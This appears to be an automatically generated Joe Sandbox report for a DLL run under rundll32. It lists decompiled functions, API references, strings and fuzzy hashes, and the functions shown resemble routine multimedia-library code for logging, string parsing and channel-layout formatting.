0x1004a304
0x1004a305
0x1004a306
0x100265c0
0x100265c6
0x100265cc
0x100265d0
0x100265d0
0x1004a23a
0x1004a23e
0x1004a240
0x1004a250
0x1004a250
0x1004a254
0x1004a259
0x1004a259
0x1004a25c
0x1004a25f
0x1004a262
0x1004a267
0x1004a26e
0x1004a271
0x1004a274
0x1004a27a
0x1004a27d
0x1004a280
0x1004a285
0x1004a287
0x1004a28a
0x1004a28d
0x1004a293
0x1004a295
0x1004a299
0x1004a29b
0x1004a2aa
0x1004a2aa
0x1004a2b0
0x1004a2b3
0x1004a2b5
0x1004a2b8
0x1004a2c8
0x1004a2ce
0x1004a2d3
0x1004a2d8
0x1004a2de
0x1004a2de
0x1004a2e1
0x1004a2e1
0x1004a2e6
0x1004a2a8
0x00000000
0x1004a2a8
0x1004a2e8
0x00000000
0x1004a2e8

APIs

AcquireSRWLockExclusive.KERNEL32 ref: 1004A262
WakeConditionVariable.KERNEL32 ref: 1004A274
ReleaseSRWLockExclusive.KERNEL32 ref: 1004A280
WaitForSingleObjectEx.KERNEL32 ref: 1004A2C8
CloseHandle.KERNEL32 ref: 1004A2D8
mv_freep.MAIN ref: 1004A2F3

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: ExclusiveLock$AcquireCloseConditionHandleObjectReleaseSingleVariableWaitWakemv_freep
String ID:
API String ID: 1841216690-0
Opcode ID: a14856d7447140d92799d6568a2db05317804891632b94121e1a719d57eb44ae
Instruction ID: bc251ce03876973850fb77e440ae180f66f2e7fe9fc8712012c25621f5453433
Opcode Fuzzy Hash: a14856d7447140d92799d6568a2db05317804891632b94121e1a719d57eb44ae
Instruction Fuzzy Hash: BF214CB15087158FC700EF68D98420EBBE0FF94340F61853DE89997215D331E599CBC6

Uniqueness

Uniqueness Score: -1.00%

Function 100304E8 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 276COMMON

Download Yara Rule

APIs

mv_strstart.MAIN ref: 1002FCB5
mv_strstart.MAIN ref: 1002FCDE

Strings

xyz, xrefs: 1002FCD5
, xrefs: 10030012
yuvj, xrefs: 1002FCA4

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_strstart
String ID: $xyz$yuvj
API String ID: 2201124280-2071466796
Opcode ID: bd39db4a194a366d109f30458d461c2df5a62078d964f913814af86215653bba
Instruction ID: fae87543b31ee3dab4fff42b62755004a6e6770c78894ec516081f8316d78002
Opcode Fuzzy Hash: bd39db4a194a366d109f30458d461c2df5a62078d964f913814af86215653bba
Instruction Fuzzy Hash: 28C1F3355083948FD342CF28D8D47AABBE2EFC6388F85496CF4D187266D275DA58CB42

Uniqueness

Uniqueness Score: -1.00%

Function 1003028C Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 275COMMON

Download Yara Rule

APIs

mv_strstart.MAIN ref: 1002FCB5
mv_strstart.MAIN ref: 1002FCDE

Strings

xyz, xrefs: 1002FCD5
, xrefs: 10030012
yuvj, xrefs: 1002FCA4

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_strstart
String ID: $xyz$yuvj
API String ID: 2201124280-2071466796
Opcode ID: 81723ec4f1f1f9ea585c3b123fc44b8cc6761d75b4754926e1d488a3831eaf29
Instruction ID: bfc651eaba2522c4d235aec60645e24123cb0f9c5bb9b4cc4e7f011c1b04411b
Opcode Fuzzy Hash: 81723ec4f1f1f9ea585c3b123fc44b8cc6761d75b4754926e1d488a3831eaf29
Instruction Fuzzy Hash: 02C103355083948FD342CF28D8D47AABBE2EFC5388F85496CF4D187266D275EA58CB42

Uniqueness

Uniqueness Score: -1.00%

Function 1001F541 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99COMMON

Download Yara Rule

APIs

mv_image_get_linesize.MAIN ref: 1001F5A7

Part of subcall function 1001E960: mv_pix_fmt_desc_get.MAIN(?,?,?,?,?,?,?,?,?,?,00000000,?,100B3560,00000000,1001F6E8), ref: 1001E976

mv_log.MAIN ref: 1001F651
mv_log.MAIN(?), ref: 1001F68E

Strings

Picture size %ux%u is invalid, xrefs: 1001F634
Picture size %ux%u exceeds specified max pixel count %lld, see the documentation if you wish to increase it, xrefs: 1001F67E

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_log$mv_image_get_linesizemv_pix_fmt_desc_get
String ID: Picture size %ux%u exceeds specified max pixel count %lld, see the documentation if you wish to increase it$Picture size %ux%u is invalid
API String ID: 1737039923-91635712
Opcode ID: df92d46b41c7d93cf8064fe713dd42f1165b0ed3c722c90c92471b13e2172188
Instruction ID: 4d78d89fad071d3c7295cc0c1cabb1fa4872bd69d58dfd2203c9a44d69170479
Opcode Fuzzy Hash: df92d46b41c7d93cf8064fe713dd42f1165b0ed3c722c90c92471b13e2172188
Instruction Fuzzy Hash: 9041B0B59083549FC350CF29C08024EFBE1FBD8754F558A2EF9A8D7350E674E9458B86

Uniqueness

Uniqueness Score: -1.00%

Function 1000C560 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCRT ref: 1000C582
strcmp.MSVCRT ref: 1000C5B0
strtol.MSVCRT ref: 1000C5DA

Strings

AMBI, xrefs: 1000C561

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: strcmpstrncmpstrtol
String ID: AMBI
API String ID: 155133989-3084986980
Opcode ID: c65f3f7975b7823a73d044f094c93d5fd796e748c7aa11a49156733d133437d6
Instruction ID: 96a3e84c180ec1e05a7f5708790a2991e0ec9e313a24bbe51d35f59fb7ac403f
Opcode Fuzzy Hash: c65f3f7975b7823a73d044f094c93d5fd796e748c7aa11a49156733d133437d6
Instruction Fuzzy Hash: B6217FB590C7864FE750DF249CC060BBAD0EF492D1F11893EE98993255E275DC85C782

Uniqueness

Uniqueness Score: -1.00%

Function 1002C02C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E1002C02C(signed char __ebx, void* __esi) {
				signed char _t39;
				void* _t40;
				void* _t43;
				signed char _t48;
				signed int _t49;
				signed int _t50;
				void _t53;
				signed char _t54;
				int _t56;
				int _t58;
				signed int _t60;
				char* _t64;
				void* _t66;
				void* _t69;
				signed char _t72;
				signed char* _t73;

				_t69 = __esi;
				_t54 = __ebx;
				do {
					_t54 = _t54 + 1;
					_t60 =  *_t54 & 0x000000ff;
				} while ((_t60 | 0x00000020) - 0x61 <= 0x19 || _t60 - 0x2d <= 0xc || _t60 == 0x5f);
				 *_t73 = _t54;
				_t73[4] = 0x100b45f0;
				_t64 = _t54 + strspn(??, ??);
				_t39 =  *_t64;
				if(_t39 == 0) {
					L13:
					if((_t73[0x5c] & 0x00000001) == 0) {
						_t40 = 0xffffffea;
						L11:
						return _t40;
					}
					_t72 = 0;
					L9:
					_t73[4] = _t73[0x58];
					 *_t73 =  &(_t73[0x2c]);
					_t43 = L10006940();
					if(_t43 == 0) {
						 *_t73 = _t72;
						L100265B0();
						_t40 = 0xfffffff4;
					} else {
						 *(_t73[0x50]) = _t73[0x2c];
						 *(_t73[0x60]) = _t72;
						 *(_t73[0x64]) = _t43;
						_t40 = 0;
					}
					goto L11;
				}
				_t73[4] = _t39;
				 *_t73 = _t73[0x54];
				if(strchr(??, ??) == 0) {
					goto L13;
				}
				_t5 = _t64 + 1; // 0x1
				_t56 = _t54 - _t69;
				_t73[0x1c] = _t5;
				_t7 = _t56 + 1; // 0x100aeb87
				 *_t73 = _t7;
				_t48 = E10026230();
				_t72 = _t48;
				if(_t48 == 0) {
					goto L13;
				}
				_t58 = _t56;
				_t66 = _t48;
				if(_t56 >= 8) {
					if((_t48 & 0x00000001) != 0) {
						_t49 =  *_t69 & 0x000000ff;
						_t66 = _t72 + 1;
						_t69 = _t69 + 1;
						_t58 = _t56 - 1;
						 *_t72 = _t49;
					}
					if((_t66 & 0x00000002) != 0) {
						_t50 =  *_t69 & 0x0000ffff;
						_t66 = _t66 + 2;
						_t69 = _t69 + 2;
						_t58 = _t58 - 2;
						 *(_t66 - 2) = _t50;
					}
					if((_t66 & 0x00000004) != 0) {
						_t53 =  *_t69;
						_t66 = _t66 + 4;
						_t69 = _t69 + 4;
						_t58 = _t58 - 4;
						 *(_t66 - 4) = _t53;
					}
				}
				memcpy(_t66, _t69, _t58);
				_t73 =  &(_t73[0xc]);
				 *((char*)(_t72 + _t56)) = 0;
				_t73[0x2c] = _t73[0x1c];
				goto L9;
			}

0x1002c02c
0x1002c02c
0x1002c030
0x1002c030
0x1002bf60
0x1002bf6d
0x1002bf8b
0x1002bf93
0x1002bf9c
0x1002bf9f
0x1002bfa4
0x1002c036
0x1002c03b
0x1002c090
0x1002c024
0x1002c02b
0x1002c02b
0x1002c03d
0x1002bff0
0x1002bff4
0x1002bffc
0x1002bfff
0x1002c006
0x1002c097
0x1002c09a
0x1002c09f
0x1002c00c
0x1002c014
0x1002c01a
0x1002c020
0x1002c022
0x1002c022
0x00000000
0x1002c006
0x1002bfaa
0x1002bfb2
0x1002bfbc
0x00000000
0x00000000
0x1002bfbe
0x1002bfc1
0x1002bfc3
0x1002bfc7
0x1002bfca
0x1002bfcd
0x1002bfd4
0x1002bfd6
0x00000000
0x00000000
0x1002bfdb
0x1002bfdd
0x1002bfdf
0x1002c04a
0x1002c06f
0x1002c072
0x1002c075
0x1002c076
0x1002c079
0x1002c079
0x1002c052
0x1002c07e
0x1002c081
0x1002c084
0x1002c087
0x1002c08a
0x1002c08a
0x1002c05a
0x1002c05c
0x1002c05e
0x1002c061
0x1002c064
0x1002c067
0x1002c067
0x1002c05a
0x1002bfe1
0x1002bfe1
0x1002bfe3
0x1002bfec
0x00000000

APIs

strspn.MSVCRT ref: 1002BF97
strchr.MSVCRT ref: 1002BFB5
mv_malloc.MAIN(?,?,?,?,?,?,?,?,?,?,100AEACF,100AEB86,00000000,?,1000DF13), ref: 1002BFCD
mv_get_token.MAIN ref: 1002BFFF

Strings

, xrefs: 1002BF8E

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_get_tokenmv_mallocstrchrstrspn
String ID:
API String ID: 476366593-596783616
Opcode ID: 29e496927f1da63fb82fa8c860c72426edcc2de4f9f69176329bf0e8f31cb9b9
Instruction ID: dc3b06df85388a75f907743202ecfe3307d48378777e578708470cdae6669aaf
Opcode Fuzzy Hash: 29e496927f1da63fb82fa8c860c72426edcc2de4f9f69176329bf0e8f31cb9b9
Instruction Fuzzy Hash: 89215E745087458FCB00DFB8D5C095ABBE5FF89284F80896ED998C7301E675E84ADB42

Uniqueness

Uniqueness Score: -1.00%

Function 10012370 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64stringCOMMON

Download Yara Rule

APIs

strftime.MSVCRT ref: 100123EF
mv_strlcatf.MAIN ref: 10012429
mv_dict_set.MAIN ref: 1001244D

Strings

%Y-%m-%dT%H:%M:%S, xrefs: 100123D6
.%06dZ, xrefs: 10012419

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_dict_setmv_strlcatfstrftime
String ID: %Y-%m-%dT%H:%M:%S$.%06dZ
API String ID: 3046200060-930656424
Opcode ID: 728a3bd6f1d20a34548cbc8e6d3f3df844403d6c227aa6eea2e28321bcd2af87
Instruction ID: 1402893b187d2e51f9b144a86c1e9403a14236be66f1ea1af33c468999098a96
Opcode Fuzzy Hash: 728a3bd6f1d20a34548cbc8e6d3f3df844403d6c227aa6eea2e28321bcd2af87
Instruction Fuzzy Hash: 982190B59093419FD350DF29E58065BBBE0FB88354F51C92EF89CC7305E639D8948B82

Uniqueness

Uniqueness Score: -1.00%

Function 1000D5CB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000D5CB(void* __edi) {
				void* _t75;

				while(1) {
					L3:
					__esi =  *(__edi + 4);
					__ebp = __ebp + 1;
					if(__esi <= __ebp) {
						break;
					} else {
						goto L4;
					}
					do {
						L4:
						if(__ebp >= __esi) {
							L42:
							__eax = 0x100aeacf;
							__esp[1] = 0x100aeacf;
							__eax = __esp[6];
							 *__esp = __esp[6];
							__eax = L100089C0();
							L9:
							__eax = __esp[6];
							__esi = "NONE";
							__esp[1] = "NONE";
							 *__esp = __esp[6];
							__eax = L100089C0();
							L10:
							if( *__edi != 2) {
								goto L3;
							}
							__edx =  *(__edi + 8);
							__eax = __ebp + __ebp * 2;
							__ecx = __edx + __eax * 8;
							if( *((char*)(__edx + 4 + __eax * 8)) == 0) {
								goto L3;
							}
							goto L12;
						}
						__eax =  *__edi;
						if(__eax == 2) {
							__edx =  *(__edi + 8);
							__eax = __ebp + __ebp * 2;
							__eax =  *(__edi + 8) + (__ebp + __ebp * 2) * 8;
							__ecx =  *( *(__edi + 8) + (__ebp + __ebp * 2) * 8);
							__ebx = __ecx - 0x400;
							if(__ebp != 0) {
								__esp[4] = __ecx;
								__eax = 0x100aeacf;
								__esp[1] = 0x100aeacf;
								__eax = __esp[6];
								 *__esp = __esp[6];
								__eax = L100089C0();
								__ecx = __esp[4];
							}
							if(__ebx > 0x3ff) {
								L38:
								if(__ecx <= 0x28) {
									L26:
									__eax =  *(0x100af280 + __ecx * 8);
									if(__eax == 0) {
										L32:
										__esp[2] = __ecx;
										__eax = __esp[6];
										__ebx = "USR%d";
										__esp[1] = "USR%d";
										 *__esp = __esp[6];
										__eax = L100089C0();
										goto L10;
									}
									__esp[2] = __eax;
									__eax = "%s";
									__esp[1] = "%s";
									__eax = __esp[6];
									 *__esp = __esp[6];
									__eax = L100089C0();
									goto L10;
								}
								if(__ecx != 0xffffffff) {
									goto L32;
								}
								goto L9;
							}
							L36:
							__esp[2] = __ebx;
							__eax = "AMBI%d";
							__esp[1] = "AMBI%d";
							__eax = __esp[6];
							 *__esp = __esp[6];
							__eax = L100089C0();
							goto L10;
						}
						if(__eax == 3) {
							__eax =  *(__edi + 8);
							__edx =  *(__edi + 0xc);
							__esp[4] = __eax;
							__ebx = __eax;
							__ecx = __eax;
							__esp[5] =  *(__edi + 0xc);
							__eax >> 1 = __eax >> 0x00000001 & 0x55555555;
							__ecx = __eax - (__eax >> 0x00000001 & 0x55555555);
							__ebx = __ecx;
							__ecx = __ecx >> 2;
							__ebx = __ebx & 0x33333333;
							__ecx = __ecx & 0x33333333;
							__ecx =  &(__ecx[__ebx]);
							__ecx = __ecx >> 4;
							__ecx =  &(__ecx[__ecx >> 4]);
							__ecx = __ecx & 0x0f0f0f0f;
							__ebx =  &(__ecx[__ecx >> 8]);
							__ecx = __esp[5];
							__eax = __ebx;
							__ecx = __ecx >> 1;
							__ecx >> 1 = __ecx >> 0x00000001 & 0x55555555;
							__ecx = __ecx - (__ecx >> 0x00000001 & 0x55555555);
							__eax = __eax >> 0x10;
							__edx = __ecx;
							__ecx = __ecx >> 2;
							__edx = __edx & 0x33333333;
							__ecx = __ecx & 0x33333333;
							__ebx =  &(__eax[__eax >> 0x10]);
							__ecx =  &(__ecx[__edx]);
							__eax =  &(__eax[__eax >> 0x10]);
							__edx = __ecx;
							__eax = __eax & 0x0000003f;
							__edx = __ecx >> 4;
							__ecx =  &(__ecx[__ecx >> 4]);
							__ecx = __ecx & 0x0f0f0f0f;
							__ecx = __ecx >> 8;
							__ecx =  &(__ecx[__ecx >> 8]);
							__ecx = __ecx >> 0x10;
							__ebx =  &(__ecx[__ecx >> 0x10]);
							__ebx =  &(__ecx[__ecx >> 0x10]) & 0x0000003f;
							__ecx =  &(__eax[ &(__ecx[__ecx >> 0x10]) & 0x0000003f]);
							__ebx = __ebp;
							__esi = __esi - __ecx;
							__ebx = __ebp - __esi;
							if(__ebp >= __esi) {
								L17:
								__esp[7] = __ebp;
								__eax = __esp[4];
								__ecx = 0;
								__edx = __esp[5];
								__ebp = __edi;
								do {
									__edi = __edx;
									__esi = __eax;
									__esi = (__edi << 0x00000020 | __eax) >> __cl;
									__edi = __edi >> __cl;
									if((__cl & 0x00000020) != 0) {
										__esi = __edi;
									}
									__esi = __esi & 0x00000001;
									if(__esi == 0) {
										goto L19;
									}
									_t31 = __ebx - 1; // 0x0
									__esi = _t31;
									if(__ebx != 0) {
										__ebx = __esi;
										goto L19;
									}
									__edi = __ebp;
									__ebp = __esp[7];
									if(__ebp != 0) {
										__esp[4] = __ecx;
										__eax = 0x100aeacf;
										__esp[1] = 0x100aeacf;
										__eax = __esp[6];
										 *__esp = __esp[6];
										__eax = L100089C0();
										__ecx = __esp[4];
										goto L38;
									}
									if(__ecx > 0x28) {
										goto L32;
									}
									goto L26;
									L19:
									__ecx =  &(__ecx[1]);
								} while (__ecx != 0x40);
								__edi = __ebp;
								__ebp = __esp[7];
								if(__ebp == 0) {
									goto L9;
								}
								goto L42;
							}
							__ebx = 0;
							if(__ebp == 0) {
								goto L36;
							}
							__eax = 0x100aeacf;
							__ebx = __ebp;
							__esp[1] = 0x100aeacf;
							__eax = __esp[6];
							_t46 = __ebp + 0x400; // 0x401
							__ecx = _t46;
							__esp[4] = _t46;
							 *__esp = __esp[6];
							__eax = L100089C0();
							__ecx = __esp[4];
							if(__ebp <= 0x3ff) {
								goto L36;
							}
							goto L32;
						}
						if(__eax == 0) {
							__eax =  *(__edi + 8);
							__ebx = __ebp;
							__edx =  *(__edi + 0xc);
							__esp[4] =  *(__edi + 8);
							__esp[5] =  *(__edi + 0xc);
							goto L17;
						}
						if(__ebp != 0) {
							goto L42;
						}
						goto L9;
						L12:
						__eax = __esp[6];
						__ecx =  &(__ecx[4]);
						__ebp = __ebp + 1;
						__esp[2] = __ecx;
						__ecx = "@%s";
						__esp[1] = "@%s";
						 *__esp = __esp[6];
						__eax = L100089C0();
						__esi =  *(__edi + 4);
					} while (__esi > __ebp);
					break;
				}
				if(__esi == 0) {
					__eax = 0;
					__esp[2] = 0;
					__eax = "%d channels";
					__esp[1] = "%d channels";
					__eax = __esp[6];
					 *__esp = __esp[6];
					L100089C0() = 0;
				} else {
					__eax = __esp[6];
					__edx = 0x100aead1;
					__esp[1] = 0x100aead1;
					 *__esp = __esp[6];
					L100089C0() = 0;
				}
				return _t75;
			}

0x1000d5d0
0x1000d5d0
0x1000d5d0
0x1000d5d3
0x1000d5d6
0x00000000
0x00000000
0x00000000
0x00000000
0x1000d5dc
0x1000d5dc
0x1000d5de
0x1000d8be
0x1000d8be
0x1000d8c3
0x1000d8c7
0x1000d8cb
0x1000d8ce
0x1000d607
0x1000d607
0x1000d60b
0x1000d610
0x1000d614
0x1000d617
0x1000d620
0x1000d623
0x00000000
0x00000000
0x1000d625
0x1000d628
0x1000d631
0x1000d634
0x00000000
0x00000000
0x00000000
0x1000d634
0x1000d5e4
0x1000d5e9
0x1000d820
0x1000d823
0x1000d829
0x1000d82c
0x1000d82e
0x1000d834
0x1000d836
0x1000d83a
0x1000d83f
0x1000d843
0x1000d847
0x1000d84a
0x1000d84f
0x1000d84f
0x1000d859
0x1000d896
0x1000d899
0x1000d6f2
0x1000d6f2
0x1000d6fb
0x1000d800
0x1000d800
0x1000d804
0x1000d808
0x1000d80d
0x1000d811
0x1000d814
0x00000000
0x1000d814
0x1000d701
0x1000d705
0x1000d70a
0x1000d70e
0x1000d712
0x1000d715
0x00000000
0x1000d715
0x1000d8a2
0x00000000
0x00000000
0x00000000
0x1000d8a8
0x1000d85b
0x1000d85b
0x1000d85f
0x1000d864
0x1000d868
0x1000d86c
0x1000d86f
0x00000000
0x1000d86f
0x1000d5f2
0x1000d720
0x1000d723
0x1000d726
0x1000d72a
0x1000d72c
0x1000d72e
0x1000d734
0x1000d73a
0x1000d73c
0x1000d73e
0x1000d741
0x1000d747
0x1000d74d
0x1000d751
0x1000d754
0x1000d756
0x1000d761
0x1000d763
0x1000d767
0x1000d76b
0x1000d76f
0x1000d775
0x1000d779
0x1000d77c
0x1000d77e
0x1000d781
0x1000d787
0x1000d78d
0x1000d78f
0x1000d791
0x1000d793
0x1000d795
0x1000d798
0x1000d79b
0x1000d79d
0x1000d7a5
0x1000d7a8
0x1000d7ac
0x1000d7af
0x1000d7b1
0x1000d7b4
0x1000d7b7
0x1000d7b9
0x1000d7bb
0x1000d7bf
0x1000d698
0x1000d698
0x1000d69c
0x1000d6a0
0x1000d6a2
0x1000d6a6
0x1000d6bc
0x1000d6bc
0x1000d6be
0x1000d6c0
0x1000d6c3
0x1000d6c8
0x1000d6ca
0x1000d6ca
0x1000d6cc
0x1000d6d2
0x00000000
0x00000000
0x1000d6d4
0x1000d6d4
0x1000d6d9
0x1000d6b0
0x00000000
0x1000d6b0
0x1000d6db
0x1000d6dd
0x1000d6e3
0x1000d879
0x1000d87d
0x1000d882
0x1000d886
0x1000d88a
0x1000d88d
0x1000d892
0x00000000
0x1000d892
0x1000d6ec
0x00000000
0x00000000
0x00000000
0x1000d6b2
0x1000d6b2
0x1000d6b3
0x1000d8b0
0x1000d8b2
0x1000d8b8
0x00000000
0x00000000
0x00000000
0x1000d8b8
0x1000d7c5
0x1000d7c9
0x00000000
0x00000000
0x1000d7cf
0x1000d7d4
0x1000d7d6
0x1000d7da
0x1000d7de
0x1000d7de
0x1000d7e4
0x1000d7e8
0x1000d7eb
0x1000d7f6
0x1000d7fa
0x00000000
0x00000000
0x00000000
0x1000d7fa
0x1000d5f9
0x1000d688
0x1000d68b
0x1000d68d
0x1000d690
0x1000d694
0x00000000
0x1000d694
0x1000d601
0x00000000
0x00000000
0x00000000
0x1000d636
0x1000d636
0x1000d63a
0x1000d63d
0x1000d63e
0x1000d642
0x1000d647
0x1000d64b
0x1000d64e
0x1000d653
0x1000d656
0x00000000
0x1000d5dc
0x1000d662
0x1000d596
0x1000d8e3
0x1000d8e7
0x1000d8ec
0x1000d8f0
0x1000d8f4
0x1000d8fc
0x1000d668
0x1000d668
0x1000d66c
0x1000d671
0x1000d675
0x1000d67d
0x1000d67d
0x1000d57c

APIs

mv_bprintf.MAIN ref: 1000D617
mv_bprintf.MAIN ref: 1000D64E
mv_bprintf.MAIN ref: 1000D678
mv_bprintf.MAIN ref: 1000D715
mv_bprintf.MAIN ref: 1000D7EB
mv_bprintf.MAIN ref: 1000D814
mv_bprintf.MAIN ref: 1000D84A
mv_bprintf.MAIN ref: 1000D86F
mv_bprintf.MAIN ref: 1000D8CE

Strings

NONE, xrefs: 1000D60B
@%s, xrefs: 1000D642

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
